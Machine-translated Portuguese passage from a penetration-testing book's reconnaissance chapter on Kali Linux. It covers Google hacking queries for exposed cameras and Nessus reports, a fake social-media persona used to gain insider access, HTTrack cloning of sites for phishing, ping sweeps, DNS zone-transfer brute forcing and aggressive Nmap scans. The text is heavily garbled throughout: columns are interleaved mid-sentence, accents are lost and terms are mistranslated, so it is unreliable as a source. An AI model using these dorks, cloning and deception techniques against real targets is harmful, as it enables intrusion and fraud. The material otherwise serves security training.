Mantendo o acesso: Manter Teste de Stress: Ferramentas de ajustar a forma como a construo de ferramentas disponveis. O prximo
ferramentas de acesso so usados testes de estresse so utilizados para Kali Linux visto em captulo ir cobrir como executar
uma vez um ponto de apoio avaliar a quantidade de dados a da rede, ferramentas de busca e Reconhecimento em um alvo. Este o
estabelecida em uma rede ou sistema pode manipular. Resultados outras aplicaes teis. primeiro e mais importante passo na
sistema alvo. comum encontrar indesejados podem ser obtidos a partir concretizao
sistemas comprometidos com vrios de sobrecarga Servios de testes de penetrao.
ganchos de volta para o atacante sistemas como causando um [31]
fornecer rotas alternativas em caso de dispositivo de controle de
uma vulnerabilidade que usado por comunicao de rede para Resumo Reconhecimento
o atacante encontrado e corrigido. abrir todos os canais de comunicao Este captulo serve como uma O termo Reconhecimento por
Engenharia reversa: Estas ou de um sistema de desligar introduo para Aplicaes Web Teste definio vem da estratgia de guerra
ferramentas so usadas para (tambm conhecido como de Invaso militar de
desativar um executvel um ataque de negao de servio). e uma viso geral sobre a criao de explorar alm da rea ocupada por
e programas de depurao. O objetivo Hardware Hacking: Esta seo Kali Linux. Ns comeamos definindo foras amigas para obter informaes
da engenharia reversa est contm ferramentas de Android, que as melhores prticas sobre o
analisando poderiam ser para a realizao de servios de Teste inimigo para anlise ou ataque futuro.
como foi desenvolvido um programa classificada como ferramentas mveis, de Penetrao incluindo risco de Reconhecimento de sistemas de
para que possa ser copiado, e Ardunio que so utilizados para a definio e diferenas computador semelhante
modificado, ou levar a programao e entre vrios servios. O principal na natureza, ou seja, normalmente um
desenvolvimento de outros controlar outros pequenos dispositivos argumento o de entender o que faz verificador da penetrao ou hacker
programas. Engenharia reversa eletrnicos. um vai tentar aprender como
tambm usado para Forense: Ferramentas forenses so Penetrao teste diferente de outros tanto quanto possvel sobre o
anlise de malware para determinar o usados para monitorar e analisar o servios de segurana, como fazer ambiente de um alvo e caractersticas
que faz um executvel ou por computador corretamente escopo do sistema antes do lanamento
pesquisadores trfego de rede e aplicaes. um nvel de servio e melhor mtodo um ataque. Isto tambm conhecido
para tentar encontrar vulnerabilidades Ferramentas de Relatrios: As para executar servios. Posicionando- como o estabelecimento de uma
em aplicaes de software. ferramentas de relatrios so mtodos se o direito Pegada de um alvo. Reconhecimento
para entregar informaes expectativas iniciais com um cliente normalmente passiva na natureza e
encontradas potencial vai melhor qualificar a em muitos casos no ilegal (no
durante um exerccio de penetrao. oportunidade entanto, no somos
advogados e no podem oferecer saber como os dados especficos foi Polticas comerciais e de segurana A pesquisa inicial
aconselhamento legal) para executar, obtida, e pedir referncias a recursos. do alvo: Como que o negcio Reconnaissance deve comear com a
desde que voc no completar um Exemplos so o que as ferramentas funcionar? aprendizagem, tanto quanto possvel
handshake de trs vias com um foram utilizadas para a obteno dos Onde esto os potenciais pontos sobre as pessoas e
sistema no-autorizado. dados ou o que publicfacing fracos na operao? negcio associado ao alvo. Sun Tzu
Exemplos de Reconnaissance incluir recursos, por exemplo, a consulta de O povo de alvo: Que tipo de pessoas creditado com a frase ", conhecer o
qualquer coisa de pesquisar um alvo pesquisa especfica no Google que foi trabalham l? Como que eles podem seu
no pblico submetido a tornar-se inimigo "no livro, A Arte da Guerra.
fontes, como o Google, a atividade de obter os dados. Informar um cliente o seu trunfo para o ataque? Como um verificador da penetrao,
monitoramento empregado para "voc obteve o objetivo" no bom o Definir metas: Quais so as menores voc precisa conhecer o seu
aprender os padres de operao, suficiente, metas de frutas penduradas? O que alvo. Se o seu alvo passa a ser um
e redes ou sistemas de varredura para porque a finalidade de um teste de deve site, voc deve olhar para todos os
coletar informaes, tais como penetrao identificar fraqueza para ser evitado? aspectos do que
fabricao reparos futuros. Rede da Target: Como as pessoas e site. Ele vai lhe dar uma melhor
tipo, sistema operacional, e portas de os dispositivos se comunicam em compreenso de como o site
comunicao abertas. Quanto mais Reconhecimento a rede? mantido e
informaes Objetivos de reconhecimento Defesas do alvo: Que tipo de executar. Grande Reconnaissance
pode ser recolhida sobre um alvo traz segurana est em vigor? Onde ela retorna mais vulnerabilidades
uma melhor chance de identificar o est localizada? possveis.
mais fcil e Tecnologias de alvo: Que tecnologias assustador a quantidade de
mtodo mais rpido para alcanar so usadas para e-mail, rede informao est disponvel em fontes
uma meta de penetrao, bem como trfego, armazenar informao, de pblicas. Temos encontrado
melhor mtodo para evitar existente autenticao, e assim por diante? Eles o inimaginvel, como documentos
segurana. Alm disso, alertando um so vulnerveis? classificados, senhas, relatrios de
alvo provavelmente ir causar Kali Linux contm um extenso vulnerabilidade,
algumas avenidas de ataque para catlogo de ferramentas intitulado fotografia indesejvel e acesso a
fechar Alvo de fundo: Qual o foco dos Coleta de Informaes cmeras de segurana. Muitos testes
como uma reao preparao para negcios do alvo? especificados para os esforos de de penetrao
um ataque. Slogan oficial da Kali diz Associados de alvo: Quem so os reconhecimento. Poderia encher um objetivos do projeto comear com
isso melhor: parceiros de negcios, fornecedores e livro separado para cobrir todas as aproveitamento de informaes fora
"O mais quieto voc se torna, mais clientes? ferramentas de fontes pblicas. Aqui esto alguns
voc capaz de ouvir" O investimento da Target em e mtodos oferecidos para coleta de pontos de partida para a coleta de
Servios de reconhecimento deve segurana: As polticas de segurana informaes. Este captulo se informaes a partir de fontes
incluir documentao pesado, porque anunciado? O que concentrar em vrios pblicas.
foram encontrados dados conscientizao de segurana da tpicos de reconhecimento de [34]
pode ser relevante em um momento segurana de investimento em aplicaes web e relacionar as
posterior, no exerccio de penetrao. potencial, e do usurio? melhores ferramentas encontradas no Captulo 2
Os clientes tambm vo querer Internet, bem como o oferecido pela Site da empresa
Kali Linux.
Existe uma grande quantidade de uma inteligncia pesquisador sobre o http://archive.org, Voc ver o Internet e em partes da regio do Caribe pode
informaes valiosas que podem ser que um alvo espera no divulgar ao Archive Wayback Machine ser encontrada em www.arin.net. Voc
obtidas no site do alvo. pblico. no meio da pgina, como mostra a pode reunir
Listar a maioria dos sites corporativos Para ver o Robots.txt arquivo, imagem a seguir: informaes sobre um alvo, como
sua equipe executiva, figuras pblicas encontrar o Robots.txt arquivo no [36] Lancope, como visto na imagem
e membros de diretrio raiz de um alvo seguinte:
recrutamento e recursos humanos site. Por exemplo, adicionando o Captulo 2 Registros Regionais da Internet (RIRs)
contatos. Estes podem tornar-se alvos Robots.txt arquivo para Facebook Digite a URL que voc gostaria de [39]
para outra pesquisa ficaria como mostrado navegar e ver se todos os arquivos
esforos e ataques de engenharia na imagem seguinte: foram capturados. Reconhecimento
social. [35] A histria do arquivo pode ser visto Eletrnico coleta de dados, anlise e
Mais informaes valiosas podem ser aqui, como mostrado na imagem Retrieval (EDGAR)
obtidas por olhar para o que as outras Reconhecimento seguinte: O banco de dados EDGAR contm
empresas Fontes de histria Web [37] declaraes de registro, relatrios
so listados como parceiros, anncios Existem verses arquivadas da peridicos, e outros
de emprego atuais, informaes maioria dos sites pblicos disponveis Reconhecimento formas de informao sobre as
comerciais e de segurana no fontes, como o Como um verificador da penetrao, empresas desde 1994. As empresas
polticas. Reconhecimento de um Wayback Machine em archive.org. esta uma ferramenta valiosa, pois nos Estados Unidos da
parceiro de alto valor pode ser to Informao de interesse podem ser no deixar provas de Amrica so obrigados por lei a
importante quanto a encontrados em mais velhos Reconhecimento em seu alvo. Na apresentar, e todas as informaes
alvo principal, porque os parceiros verso do site de um alvo, como verdade, o seu alvo nunca sequer esto disponveis ao pblico. O
podem fornecer uma nova fonte para organogramas desatualizados, tocou usando este duas seguintes imagens mostram
a obteno de nmeros de telefone, ferramenta. Toda a informao foi documentos pblicos encontrados
inteligncia. Um exemplo inteligncia do cliente, sistemas de arquivada em linha no Wayback durante a pesquisa Lancope:
comprometer um recurso contratado informao listada nos campos, tais Machine. O [40]
que gerencia como ver fonte ou duas prximas imagens mostram
o helpdesk na sede do alvo. / Robots.txt, Parcerias de negcios www.lancope.com em 2002 em Captulo 2
O Robots.txt arquivo est disponvel e mais velhos, vulnerabilidades comparao a 2013: Recursos de mdia social
encontrado em sites publicamente que corrigidas em verses posteriores, [38] A mdia social est em toda parte, e
d e outros dados teis, o alvo no quer na maioria dos casos, acessvel ao
instrues para os robs web na verso de site atual. Captulo 2 pblico. A maioria das pessoas tem
(tambm conhecido como o importante entender que a informao RIR uma organizao que gerencia um Facebook, LinkedIn, blogs, ou
mecanismo de busca), sobre o que publicamente disponvel difcil de a alocao de recursos e registro de outras formas de contas nuvem
e no visvel usando o Robots remover IP contendo valioso
Exclusion Protocol. O Disallow: / completamente, fazendo com que as dentro de uma regio especfica do informaes. Esta informao pode
afirmao fontes histricas de um lugar valioso mundo. H cinco principais RIRs: a ser usada como um meio de
diz um navegador no visitar uma para a pesquisa de reconhecimento. EUA, Canad, inteligncia engenharia social
fonte, no entanto, uma Disallow pode Para acessar o Wayback Machine,
ser ignorado, dando abrir o navegador web e navegue at
de pessoal atual ou anterior de um para uma Carne sistema projetado tipicamente ansioso para compartilhar um edifcio pblico. Fontes de
alvo. Um exemplo a pesquisa para comprometer navegadores de informaes com um novo potencial mapeamento on-line, como o Google
Glassdoor.com para Internet mais vulnerveis (com carne de aluguer, o que pode ser usado Maps pode ajudar a identificar
identificar os funcionrios anteriores bovina como onde a segurana fsica
que esto descontentes, com base no coberto mais tarde neste livro), e uma avenida a informao implementada, e as tendncias sobre
feedback. informaes confidenciais capturado a privilegiada. Um exemplo alvo de um a forma como as pessoas se
H muitas pessoas que encontram os partir comprometida anncio de emprego para um Orculo deslocam de e para
recursos da web como Maltego sistemas. Ns fomos capazes de desenvolvedor para entender o a partir do alvo. Outras reas de
(encontrado em Kali Linux) mapear toda a organizao, obter hardware, verso do Oracle, os nomes interesse so a identificao de onde
que pode pentear meios populares informaes sobre a rede, dos existentes e um verificador da penetrao
sociais, registros pblicos, e sites de e ainda teve hardware embarcado administradores anteriores, as poderia acampar para procurar redes
recrutamento de trabalho para para ns sem o nmero de e-mail ou questes existentes de operao, sem fio, e os possveis mtodos para
impresso digital de um indivduo com telefone interno. falhas de segurana e mtodos para derivao
base em informao limitada, como Nossa pessoa falsa, Emily Williams acesso, como perguntar "pode controles de acesso, tais como trajes
um primeiro e ltimo nome. no real, ofertas de emprego ainda administradores trabalhar em casa, e e emblemas usados para obter acesso
Um pesquisador pode coletar recebeu, foi fornecido dentro como eles acessam fsico.
informaes como em todos os informao e acesso a eventos os sistemas? " Shodan
lugares um indivduo vive, organizados pelo alvo. Informao [41] Shodan um motor de busca que
feito negcios, pessoas com as quais poder, e pode identificar um dispositivo
eles se socializar, interesses as pessoas vo dar a um solicitador Reconhecimento especfico, como o computador,
especiais, esporte favorito que parece que eles podem ser Outra via de avaliar o salrio de um router, um servidor, usando uma
equipes, e outros dados teis para confiveis. trabalho esperado, benefcios e taxa variedade de filtros, tais como os
futuros ataques de pesquisa e Mais informaes sobre este projeto de rotatividade no metadados de faixas do sistema.
engenharia social. podem ser encontradas em: placas do trabalho populares. Estas Por exemplo, voc pode procurar por
Confiana http://www.thesecurityblogger.com/?p= tendncias podem descobrir novos um sistema especfico, como um
A maioria das pessoas so 1903 vetores de ataque. Glassdoor. Cisco 3850, correndo
naturalmente confiante e assumir Postagens de emprego com um exemplo de uma fonte uma verso do software, tais como
informaes publicadas em fontes Postagens de emprego contm uma popular para este tipo de dados. IOS verso 15.0 (1) EX.
pblicas riqueza de conhecimentos sobre o Localizao [42]
real. Para testar este conceito, os ambiente de um alvo. Anncios de O investimento em segurana
autores deste livro criou uma falsa emprego ciberntica para um alvo geralmente Captulo 2
pessoa atravs sociais pode fornecer mais detalhes sobre pode ser determinado com base em O exemplo a seguir um caso de uso
mdia e fingiu ser uma nova que tipo de sistemas so instalados, o nvel de segurana fsica. Seria de em busca de qualquer sistema
contratao para uma empresa-alvo. que os administra, como supor um edifcio com cercas e SCADA com pblico
A pessoa seria falso grande o pessoal , e nvel de armado Acesso Internet, o que, em teoria,
se tornar amigos com os associados habilidade dos funcionrios. guardas teria um investimento maior no deveria existir no entanto, pode
de nossa meta, carto postal de frias Representantes de Recursos em segurana ciberntica do que um mostrar Shodan
falsos que esto ligados Humanos so alvo localizado dentro
isto no necessariamente verdade. Google Hacking Banco de Dados mudou de computadores no
Coisas de controle sistemas SCADA, Captulo 2 autorizados. No entanto, neste caso,
como gerenciamento de energia Algumas consultas exemplo da Reconhecimento os administradores da esquerda
e tratamento de gua, de modo que a pesquisa so os seguintes: Para acessar o GHDB, navegue at assistente padro rodando sem
identificao de sistemas acessveis http://www.exploit-db.com/google- nenhuma configurao.
pblicas extremamente ruim! dorks/. Quando clicamos no primeiro link,
[43] Voc vai ver as ltimas pesquisas temos a tela inicial para configurar o
Identifica documentos sensveis: GHDB listados na pgina web. Voc software.
Reconhecimento intext: classificadas secreto pode clicar em qualquer O GHDB essencialmente transforma o
Google hackers Identifica Linksys GUIs de da pesquisa questiona a si mesmo. Google em um scanner de aplicaes
Google hacking a forma mais gerenciamento de cmera (cuidado: Voc vai encontrar diferentes web limitado para um
comum de motor de busca de voc pode no gostar categorias de pesquisas na parte Verificador da penetrao. Neste
reconhecimento de web o que voc encontrar): inurl: main.cgi inferior da pgina que tem caso, um bom software que pode
aplicaes. Google Hacking usa Identifica Nessus relatrios para foi salvo. No exemplo a seguir, aumentar a segurana pode agora
operaes avanadas no motor de encontrar sistemas vulnerveis: inurl: desloque-se para a categoria Arquivos potencialmente ser usado contra um
busca Google NESSUSXXXXXXXX Vulnervel servidor web por um invasor.
para localizar seqncias especficas Para mais informaes sobre Google e selecione a consulta Assistente Pesquisando redes
de texto dentro de resultados de hacking, confira um bom livro Carregador ionCube. Muitas pessoas no entendem o
pesquisa. Filtros de pesquisa pode se intitulado Google [46] verdadeiro propsito de pesquisar a
concentrar em Hacking para testadores de rede de um
verses especficas de aplicaes penetrao por Johnny Long, bem Captulo 2 alvo antes de lanar um ataque.
web vulnerveis, tais como como o seu website em http:// Podemos selecionar a consulta de Amadores Penetrao Testers
Desenvolvido por Apache no johnny.ihackstuff.com. pesquisa, e vai trazer-nos para o compreender a necessidade
intitle: "index of" operador ou O Google Hacking Banco de Dados Google, a realizao do para escolher um alvo antes que eles
identificar arquivos de log como (GHDB) criado por Johnny Long de mesma consulta de pesquisa. possam realizar um teste de
ws_ftp.log, Contendo Hackers Para [47] penetrao. Depois de tudo, um
informaes de IP sensvel. A seguir Caridade Penetrao
alguns screenshots demonstrar (http://www.hackersforcharity.org/), a Reconhecimento Tester precisa de um lugar em que
usando um Google fonte definitiva para o Google O exemplo anterior mostra Google para apontar o seu arsenal de
procurar Linksys para encontrar consultas de pesquisa. Procura por encontrou alguns resultados. O ferramentas. Muitos amadores
cmeras Linksys publicamente nomes de usurio, senhas, sistemas ionCube Carregadeira vontade
disponveis. A primeira imagem vulnerveis e exploits , aparentemente, no configurado ou executar o Nmap, varreduras de ping,
mostra o comando de pesquisa foram capturados e categorizados por mal configurado. O ionCube ou outras ferramentas ruidosas para
seguido de alguns exemplos de aficionados de hackers do Google. Os Carregadeira , na verdade, um determinar o que esto disponveis
resultados de emisso da pesquisa. aficionados grande pedao de software que alvos
A ltima imagem mostra um avano que categorizou as buscas do Google protege o software escrito em PHP de perturbando o ambiente, o que mais
de cmera que poderia ser encontrado so afetuosamente conhecido como serem visualizados ou tarde produz resultados pobres.
usando esta tcnica. idiotas do Google.
[44] [45]
Reconhecimento de rede sobre a Reconhecimento. Outras ferramentas imagem mostra um diretrio criado imagem mostra *para todos os
seleo de um alvo. A segurana da podem estar disponveis para nomeado mywebsites usando o mkdir arquivos). Voc tambm pode definir
rede experiente aplicaes web ou comando. as opes de linha de comando
profissional ir dizer-lhe boa diferentes tipos de destino no entanto, Para iniciar HTTrack, tipo httrack na ou bandeiras voc pode querer definir.
Reconnaissance sobre a seleo de o foco deste captulo permitir que janela de comando e dar ao projeto O exemplo na imagem seguinte
uma meta de qualidade, um um nome, como mostrado na imagem mostra nenhum
passar a maior parte do seu tempo a leitor para avaliar alvos baseados em seguinte: opes adicionais.
ver, em vez de agir. O primeiro passo aplicativos web. O prximo passo selecionar um Antes httrack executado, ele ir
de HTTrack - clonar um site diretrio para salvar o site. O exemplo mostrar o comando que est sendo
cada teste de penetrao HTTrack uma ferramenta construda na executado. Voc pode usar este
precisamente encontrar e selecionar em Kali. O objetivo do HTTrack imagem seguinte mostra a pasta comando no futuro, se voc deseja
as metas de qualidade. copiar um site. criada no passo anterior / Root / executar httrack sem passar pelo
[48] Ela permite que um verificador da mywebsites, Usado para o diretrio: assistente
penetrao de olhar para todo o Digite a URL do site que voc deseja novamente. As duas imagens
Captulo 2 contedo de um site, todas as suas capturar. O exemplo a seguir seguintes mostram hhtrack clonagem
Do ponto de vista do cliente, pginas, imagem mostra www.drchaos.com. www.drchaos.com:
Penetrao Testers vai encontrar e os arquivos off-line, e em seu Isso pode ser qualquer site. A maioria [51]
indivduos prprio ambiente controlado. Alm dos ataques
que a satisfao do ganho em parar disso, vamos usar usar um site acessado por clientes de Reconhecimento
testadores de penetrao de provar o HTTrack para ataques de engenharia seu alvo, como social popular Depois de terminar a clonagem do
seu valor social em captulos posteriores. Ter sites de mdia ou sites internos do site, navegue at o diretrio onde voc
como empregados, bem como a forma uma cpia de um site alvo. salvou. L dentro, voc vai encontrar
como ela est bem preparada para pode ser usado para desenvolver sites As prximas duas opes so todos os seus arquivos e pginas da
ataques cibernticos. Ele phishing falsos, os quais podem ser apresentadas sobre o que voc quer web, como mostra a
altamente recomendvel que um incorporados em outros fazer com o tela a seguir:
verificador da penetrao profissional Conjuntos de ferramentas de teste de local capturado. Opo 2 o mtodo Agora voc est pronto para pesquisar
no penetrao. mais fcil, que um stio de espelho o site do seu alvo e, eventualmente,
entrar em conflito com o pessoal do Para usar o HTTrack, abra um com construir uma
cliente, enquanto os servios de Terminal janela e digite apt-get install um assistente, como mostrado na ferramenta de penetrao
penetrao esto sendo httrack imagem seguinte: personalizado ou explorar o acesso do
realizada. Um verificador da como mostrado na figura a seguir. [50] usurio a um site clonado.
penetrao deve se concentrar em Algumas verses de Kali no tem este O sibilo e traceroute comandos so
conscincia da segurana, built-in. Captulo 2 boas maneiras de descobrir
e revelar o que vulnerabilidades [49] Em seguida, voc pode especificar se informaes bsicas
existem com o mnimo de interao voc quiser usar um proxy para iniciar sobre o seu destino. Quando a
com o pessoal do alvo durante um Reconhecimento o ataque. Voc tambm pode informao viaja atravs de redes, ele
compromisso de servio. Voc vai querer criar um diretrio para especificar o tipo de arquivos que no costuma ir
A seguir, so as melhores ferramentas armazenar seu site copiado. A voc deseja fazer o download (o
disponveis no Kali para aplicao web sequncia exemplo a seguir
diretamente da origem para o destino. Uma varredura ICMP envia verificar em um host de cada vez. O google.com.
Geralmente atravessa vrios simplesmente fora uma solicitao de fping comando permitir que voc Tcnicas de reconhecimento DNS
sistemas, tais eco e procura por uma resposta. Se a pingue mltipla [53]
como roteadores, firewalls e outros resposta hosts com um nico comando. Ele
sistemas de computador antes que ele retornado, ento, como um tambm ir permitir que voc leia um Reconhecimento
chegue ao seu destino. verificador da penetrao, voc sabe arquivo com mltiplas Informaes de DNS sobre um alvo
O traceroute comando identifica cada que h um possvel alvo. O nomes de host ou endereos IP e em particular pode ser extremamente
sistema os dados viajam atravs de, problema com varreduras ICMP ICMP envi-los usando requisies ICMP til para uma penetrao
juntamente com que normalmente bloqueado pela pacotes. Tester. DNS permite que um
o tempo que leva para que os dados maioria dos firewalls. Que Para usar o fping comando para verificador da penetrao para mapear
para se deslocar entre os sistemas. A significa qualquer scans de fora indo executar uma varredura ICMP em sistemas e subdomnios. Mais velho
ferramenta instalada em cada para uma rede de destino interno ser uma rede, emitir o Ataques DNS transferir um arquivo de
sistema operacional moderno. Para a bloqueada pelo seguinte comando: zona de um DNS autoritrio,
maioria dos alvos de alto valor, o sibilo um scanner de ICMP. pedaos de rede / host Fping-asg permitindo que o testador
e traceroute O sibilo comando a forma mais fping-asg 10.0.1.0/24 examinar o contedo completo do
comandos provavelmente ser bsica para iniciar uma varredura Embora o umabandeira ir retornar os arquivo de zona para identificar alvos
desativada, e uso excessivo destes ICMP. Basta digitar resultados atravs do endereo IP de potenciais. Infelizmente,
servios em sibilo seguido por um nome de hosts ao vivo s, o sbandeira maioria dos servidores DNS atuais
a maioria dos alertas de disparo host ou endereo IP para ver o que vai exibe estatsticas sobre a no permitem transferncias de zona
provveis sobre os sistemas de responder ao ICMP digitalizao, o gconjuntos de no autenticado. No entanto, todos
segurana de rede. Muitos firewalls ou echo pedido. A figura a seguir mostra bandeira fping no modo bastante, o no est perdido! DNS por sua prpria
outros um ping www.google.com: que significa que natureza um servio que responde a
criao de sistemas que no Tcnicas de reconhecimento de ICMP faz mostrar ao usurio o status de consultas e, portanto,
responder s rotas nmero B24RYE. [52] cada varredura, apenas o resumo, um invasor pode usar uma consulta de
Se os sistemas no respondem quando se completou. lista de palavras que contm centenas
para traceroute, Usando isso tambm Captulo 2 O Nmap fornece resultados de nomes com DNS
excessivamente pode desencadear Se voc receber qualquer resposta de semelhantes, como o fping comando. servidor. Este vetor de ataque uma
eventos de segurana. Estas volta, voc vai saber que o seu A maioria dos alvos de alto valor tem tarefa extremamente demorada, no
ferramentas so anfitrio est vivo. Se voc receber um nome DNS associado a uma entanto, a maioria
barulhento, e quando usados qualquer aplicao. DNS aspectos pode ser automatizado.
indiscriminadamente, eles vo tempos de espera, o seu pedido ICMP nomes de torn-lo mais fcil para que Escavao (Domnio informaes
disparar alarmes e logs. Se o seu est sendo bloqueado, ou nenhum os usurios acessem um determinado groper) um DNS mais popular e
objetivo host de destino recebeu servio e adicionar uma camada de amplamente utilizado
est a ser furtivo, voc tem apenas seu pedido. profissionalismo ao seu sistema. Por Ferramentas de reconhecimento. Ele
sido derrotada, dando o seu alvo a O problema com o sibilo comando exemplo, se voc quiser acessar o consulta os servidores DNS. Para usar
oportunidade de que ele s permite a utilizao de Google para Dig, abrir um prompt de comando
configurar e implementar ICMP para informaes, voc poderia abrir um e tipo cavar e hostname, em que
contramedidas contra o seu teste de navegador e digitar 74.125.227.101 ou hostname representa o domnio de
penetrao. tipo www. destino. Escavao
ir utilizar os seus sistemas alvos potencialmente alto valor. fierce.pl-dns thesecurityblogger.com Maltego uma ferramenta de
operacionais configuraes de DNS Antes de comear a escolher [56] reconhecimento incorporada Kali
padro para consultar o nome do host. aleatoriamente anfitries, devemos desenvolvido por Paterva. um
Voc tambm pode configurar Dig consultar o servidor DNS para ver Captulo 2 ferramenta Reconnaissance multiuso
para consultar servidores DNS que existem entradas. A melhor O domnio thesecurityblogger.com, que pode reunir informaes usando
personalizado, adicionando @ <IP> ao maneira de fazer isso perguntar o Mostrado na imagem anterior, tem aberto e
comando. O exemplo na imagem a servidor DNS para nos dizer. Se o alguns servidores associados. Ns informao pblica na Internet. Tem
seguir ilustra usando Dig em Servidor DNS est configurado para realizamos nossa tarefa. No entanto, alguns embutido Reconnaissance
www.cloudcentrics.com. permitir transferncias de zona, que voc pode DNS, mas
[54] vai nos dar uma cpia de todas as ver Fierce fracassada de completar muito mais profundo em
suas entradas. uma transferncia de zona. Fierce vai fingerprinting seu alvo e recolha de
Captulo 2 [55] tentar a fora bruta de uma zona informaes sobre
O -T opo Dig vai delegar uma zona transferir usando uma lista de palavras los. Leva as informaes e exibe os
DNS para usar o nome de autoridade Reconhecimento ou arquivo de dicionrio, se tiver um resultados em um grfico para anlise.
servidores. Ns digite dig-t ns Kali navios com uma ferramenta definido. Ns no o fez, Para iniciar Maltego, navegue at
cloudcentrics.com no exemplo da chamada Fierce. Fierce ir verificar porque o objetivo desta seo Aplicao Menu em Kali, e clique no
tela a seguir: para ver se o servidor DNS permite determinar o que existe anfitries no Barrilha menu.
Vemos a partir dos resultados que transferncias de zona. Se so domnio, no Em seguida, selecione Coleta de
temos dois servidores DNS permitidas transferncias de zona, necessariamente neste momento Informaes |Anlise DNS |Maltego.
autorizados para o domnio Fierce ir executar uma transferncia realizar um ataque de transferncia de O primeiro passo ao iniciar Maltego
www.cloudcentrics.com, Pois eles so de zona e zona. No entanto, se o seu objetivo registr-lo. Voc no pode usar o
ns3681.hostgator.com e ns3682. informar o usurio sobre as entradas. mais abrangente do que a aplicao sem registro.
hostgator.com. Se o servidor DNS no permite segmentao de aplicaes web, voc [57]
Parabns, voc acaba de encontrar o transferncias de zona, Fierce pode querer explorar mais este
servidor DNS autorizado para o seu pode ser configurado para nomes de em seu prprio pas. Reconhecimento
alvo de DNS. host de fora bruta em um servidor Agora podemos atingir um Quando voc completar o registro,
Identificao do alvo DNS DNS. Fierce concebido como determinado host e usar ferramentas voc vai ser capaz de instalar e
Agora que voc j encontrou os uma ferramenta de reconhecimento como o Nmap para prosseguir em comear a usar Maltego
servidores DNS autoritativos para um antes de usar uma ferramenta que mapeando o nosso alvo. Um aspecto da aplicao.
domnio, voc pode requer que voc sabe os endereos importante do uso Fierce est Maltego tem vrios mtodos de coleta
quero ver o que anfitries tm IP, selecionando um alvo de informaes. A melhor maneira de
entradas sobre esse domnio. Por como o nmap. usando muito pouco trfego de rede, o usar
exemplo, o domnio Para usar Fierce, navegue at Coleta que importante para evitar a Maltego aproveitar o assistente de
drchaos.com pode ter vrios hosts. tal de Informaes |Anlise DNS |Fierce. deteco. Iremos inicializao para selecionar o tipo de
como cloud.drchaos.com,correio. Fierce ser carregado em uma janela usar o Nmap para reunir mais informao
drchaos. de terminal, como mostrado na informaes sobre o nosso alvo mais que pretende reunir. Os usurios
com,sharepoint.drchaos.com. Todos imagem seguinte. adiante neste captulo. experientes pode querer comear com
estes podem ser potenciais aplicaes Para executar o Feroz script, digite o Grficos de coleta de informaes - um grfico em branco ou pular
e seguinte comando: Maltego
o assistente todos juntos. O poder de uma rede. Nmap tem recursos Para abrir Zenmap, ir para o Backtrack reflexo pode ser a de excluir perfis
Maltego que ele permite que voc avanados que podem detectar menu. Navegue at Mapeamento de postar execuo. Aqui est uma
observar visualmente o diferentes aplicaes Informaes | palavra de conselho: perfis
relao entre um domnio, rodando em sistemas, bem como Anlise DNS, e lanamento Zenmap. no tomar qualquer espao e vir a
organizao e pessoas. Voc pode se servios e recursos de impresso Voc vai notar sob o Perfil menu que calhar quando voc quer recriar algo.
concentrar em torno de um digital OS. um existem vrias opes para determinar Ns
organizao especfica, ou olhar para dos scanners mais utilizados rede que tipo de verificao que gostaria de recomendar sendo extremamente
uma organizao e suas parcerias tornando-se muito eficaz, mas executar, como mostrado na imagem descritivo em nomes de perfil e chegar
relacionados de tambm muito seguinte: a um
Consultas DNS. detectvel. Recomendamos o uso do [60] mtodo de nomeao padro. Eu
Dependendo das opes de Nmap em situaes muito especficas comeo toda a minha descrio de
digitalizao escolhido, Maltego para Captulo 2 perfil com a data, hora,
permitir que voc execute o evitar disparar os sistemas de defesa O primeiro passo criar um novo descrio da minha posio, a minha
seguintes tarefas: de um alvo. perfil. Um perfil em Zenmap permite rede local alvo de verificao e nome
Para mais informaes sobre como uma penetrao do cliente.
usar o Nmap, consulte Tester para criar o tipo de verificao [61]
http://nmap.org/. para executar e que opes diferentes
Alm disso, Kali vem carregado com para incluir. Reconhecimento
Associar um endereo de e-mail para Zenmap. Zenmap d Nmap uma Navegue at a Perfil menu e selecione Ao concluir a sua descrio, clique no
uma pessoa grfica Novo perfil ou Command para criar um Digitalizao guia. No Alvos seo,
Sites associados a uma pessoa interface com o usurio (GUI) para novo voc vai adicionar o que os hosts ou
Verifique o endereo de e-mail executar comandos. Embora existam perfil, como mostrado na imagem redes que voc gostaria de digitalizar.
Rena detalhes do Twitter, incluindo muitos puristas que vontade seguinte: Este campo pode assumir
geolocalizao de fotos dizer-lhe a verso de linha de Quando voc seleciona Novo perfil ou uma gama de endereos IP (10.0.1.1-
[58] comando a melhor verso por causa de comando, o editor de perfis ser 255) ou pode ter uma rede em formato
de sua velocidade e iniciado. Voc ir CIDR
Captulo 2 flexibilidade, Zenmap j percorreu um precisa dar o seu perfil de um nome (10.0.1.0/24).
A maioria dos recursos so auto- longo caminho e incorporou a maior descritivo. Por exemplo, voc pode Voc pode ver a opo -A
explicativos e incluem como eles so parte do Nmap ligar para o perfil Meu selecionada por padro para permitir a
usados sob a recursos. Zenmap tambm oferece First Scan ou qualquer outra coisa que digitalizao agressivo. Agressivo
descrio caracterstica. Maltego recursos exclusivos no oferecidos no voc gostaria. digitalizao permitir a deteco de
comumente utilizado para coletar Nmap, como Opcionalmente, voc pode dar o perfil SO (-O), deteco de verso (-SV), de
informaes e, por vezes, desenvolvimento de representaes de uma descrio. Durante o curso de varredura de script (-SC)
usado como o primeiro passo, durante grficas de um varrimento, que pode usar e traceroute (- traceroute).
um ataque de engenharia social. ser usado mais tarde por outra Zenmap voc provavelmente ir criar Essencialmente, a digitalizao
Nmap sistemas de informao. muitos perfis e fazer vrios exames. A agressivo permite ao usurio ligar
Nmap significa Network Mapper, e [59] natural vrios sinalizadores, sem a
usado para fazer a varredura de hosts necessidade de ter que se lembrar
e servios na Reconhecimento deles.
Varredura agressivo considerado a varredura consideravelmente mais Embora haja muitas maneiras de obter
intrusivo, o que significa que ser longo, o -Pn flag permite Nmap para Captulo 2 sadas de Nmap (por exemplo, os
detectado pela maioria evitar um comum Se voc olhar para a janela de autores
dispositivos de segurana. Uma problema de no receber uma digitalizao, voc no s vai ver neste livro preferem as tcnicas de
varredura agressivo pode passar resposta de ping, quando os pedidos quais portas esto abertas em linha de comando), inclumos esta
despercebida se o seu alvo um de ping so bloqueados por especfico tcnica
extremamente especfico de defesas de segurana. exrcitos, mas tambm o que as porque ele constantemente
acolhimento, mas, independentemente Salve as alteraes feitas clicando no aplicaes esto em execuo nesses referenciado em muitos padres de
da situao, recomendado que voc Salvar alteraes boto no canto hosts. Observe que o Nmap pode penetrao da web e um
